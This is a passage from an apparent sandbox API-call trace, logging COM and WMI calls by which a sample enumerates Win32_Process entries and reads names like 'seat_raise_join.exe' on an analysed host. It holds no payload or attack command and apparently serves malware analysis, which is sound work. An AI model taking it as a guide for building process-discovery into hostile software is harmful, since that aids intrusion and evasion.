puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.670] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.670] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.670] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.670] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.670] IWbemClassObject:Get (in: This=0x7423d8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e668c*=0, plFlavor=0x26e6690*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="seat_raise_join.exe", varVal2=0x0), pType=0x26e668c*=8, plFlavor=0x26e6690*=0) returned 0x0 [0224.670] SysStringByteLen (bstr="seat_raise_join.exe") returned 0x26 [0224.670] SysStringByteLen (bstr="seat_raise_join.exe") returned 0x26 [0224.671] IWbemClassObject:Get (in: This=0x7423d8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e668c*=8, plFlavor=0x26e6690*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="seat_raise_join.exe", varVal2=0x0), pType=0x26e668c*=8, plFlavor=0x26e6690*=0) returned 0x0 [0224.671] SysStringByteLen (bstr="seat_raise_join.exe") returned 0x26 [0224.671] SysStringByteLen (bstr="seat_raise_join.exe") returned 0x26 [0224.671] CoTaskMemAlloc (cb=0x4) returned 0x5e8cda8 [0224.671] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cda8, puReturned=0x26dde18 | out: apObjects=0x5e8cda8*=0x742570, puReturned=0x26dde18*=0x1) returned 0x0 [0224.672] IUnknown:QueryInterface (in: This=0x742570, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742570) returned 0x0 [0224.672] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.672] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.672] IUnknown:AddRef (This=0x742570) returned 0x3 [0224.672] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.672] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.672] IUnknown:QueryInterface (in: This=0x742570, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x742574) returned 0x0 [0224.673] IMarshal:GetUnmarshalClass (in: This=0x742574, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.673] IUnknown:Release (This=0x742574) returned 0x3 [0224.673] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.673] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.673] IUnknown:QueryInterface (in: This=0x742570, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.673] IUnknown:Release (This=0x742570) returned 0x2 [0224.673] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.673] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.673] IUnknown:QueryInterface (in: This=0x742570, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742570) returned 0x0 [0224.673] IUnknown:AddRef (This=0x742570) returned 0x4 [0224.673] IUnknown:Release (This=0x742570) returned 0x3 [0224.673] IUnknown:Release (This=0x742570) returned 0x2 [0224.673] CoTaskMemFree (pv=0x5e8cda8) [0224.673] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.673] IUnknown:AddRef (This=0x742570) returned 0x3 [0224.673] IWbemClassObject:Get (in: This=0x742570, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.674] IWbemClassObject:Get (in: This=0x742570, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2440\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.674] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2440\"") returned 0x66 [0224.674] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2440\"") returned 0x66 [0224.674] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.674] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.674] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.674] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.675] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cda8) returned 0x0 [0224.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cda8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.675] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cda8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a7b0) returned 0x0 [0224.675] WbemDefPath:IUnknown:Release (This=0x5e8cda8) returned 0x0 [0224.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a7b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a7b0) returned 0x0 [0224.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a7b0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.676] WbemDefPath:IUnknown:AddRef (This=0x5e8a7b0) returned 0x3 [0224.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a7b0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a7b0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a7b0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8cdb8) returned 0x0 [0224.676] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8cdb8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.676] WbemDefPath:IUnknown:Release (This=0x5e8cdb8) returned 0x3 [0224.676] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.676] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a7b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.676] WbemDefPath:IUnknown:Release (This=0x5e8a7b0) returned 0x2 [0224.676] WbemDefPath:IUnknown:Release (This=0x5e8a7b0) returned 0x1 [0224.676] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.677] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.677] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a7b0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a7b0) returned 0x0 [0224.677] WbemDefPath:IUnknown:AddRef (This=0x5e8a7b0) returned 0x3 [0224.677] WbemDefPath:IUnknown:Release (This=0x5e8a7b0) returned 0x2 [0224.677] WbemDefPath:IWbemPath:SetText (This=0x5e8a7b0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2440\"") returned 0x0 [0224.677] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.677] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.677] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.677] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.677] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.677] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.677] IWbemClassObject:Get (in: This=0x742570, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e6f24*=0, plFlavor=0x26e6f28*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="formerbuildpresent.exe", varVal2=0x0), pType=0x26e6f24*=8, plFlavor=0x26e6f28*=0) returned 0x0 [0224.677] SysStringByteLen (bstr="formerbuildpresent.exe") returned 0x2c [0224.677] SysStringByteLen (bstr="formerbuildpresent.exe") returned 0x2c [0224.677] IWbemClassObject:Get (in: This=0x742570, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e6f24*=8, plFlavor=0x26e6f28*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="formerbuildpresent.exe", varVal2=0x0), pType=0x26e6f24*=8, plFlavor=0x26e6f28*=0) returned 0x0 [0224.677] SysStringByteLen (bstr="formerbuildpresent.exe") returned 0x2c [0224.677] SysStringByteLen (bstr="formerbuildpresent.exe") returned 0x2c [0224.677] CoTaskMemAlloc (cb=0x4) returned 0x5e8cde8 [0224.677] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cde8, puReturned=0x26dde18 | out: apObjects=0x5e8cde8*=0x742708, puReturned=0x26dde18*=0x1) returned 0x0 [0224.678] IUnknown:QueryInterface (in: This=0x742708, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x742708) returned 0x0 [0224.678] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.679] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.679] IUnknown:AddRef (This=0x742708) returned 0x3 [0224.679] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.679] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.679] IUnknown:QueryInterface (in: This=0x742708, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x74270c) returned 0x0 [0224.679] IMarshal:GetUnmarshalClass (in: This=0x74270c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.679] IUnknown:Release (This=0x74270c) returned 0x3 [0224.679] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.679] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.679] IUnknown:QueryInterface (in: This=0x742708, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.679] IUnknown:Release (This=0x742708) returned 0x2 [0224.679] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.679] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.679] IUnknown:QueryInterface (in: This=0x742708, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x742708) returned 0x0 [0224.679] IUnknown:AddRef (This=0x742708) returned 0x4 [0224.679] IUnknown:Release (This=0x742708) returned 0x3 [0224.679] IUnknown:Release (This=0x742708) returned 0x2 [0224.680] CoTaskMemFree (pv=0x5e8cde8) [0224.680] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.680] IUnknown:AddRef (This=0x742708) returned 0x3 [0224.680] IWbemClassObject:Get (in: This=0x742708, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.680] IWbemClassObject:Get (in: This=0x742708, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2448\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.680] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2448\"") returned 0x66 [0224.680] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2448\"") returned 0x66 [0224.681] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.681] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.681] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.681] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.681] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cde8) returned 0x0 [0224.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cde8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.682] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cde8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a890) returned 0x0 [0224.682] WbemDefPath:IUnknown:Release (This=0x5e8cde8) returned 0x0 [0224.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a890, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a890) returned 0x0 [0224.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a890, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.682] WbemDefPath:IUnknown:AddRef (This=0x5e8a890) returned 0x3 [0224.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a890, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a890, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a890, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8cdf8) returned 0x0 [0224.682] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8cdf8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.682] WbemDefPath:IUnknown:Release (This=0x5e8cdf8) returned 0x3 [0224.682] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.683] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.683] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a890, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.683] WbemDefPath:IUnknown:Release (This=0x5e8a890) returned 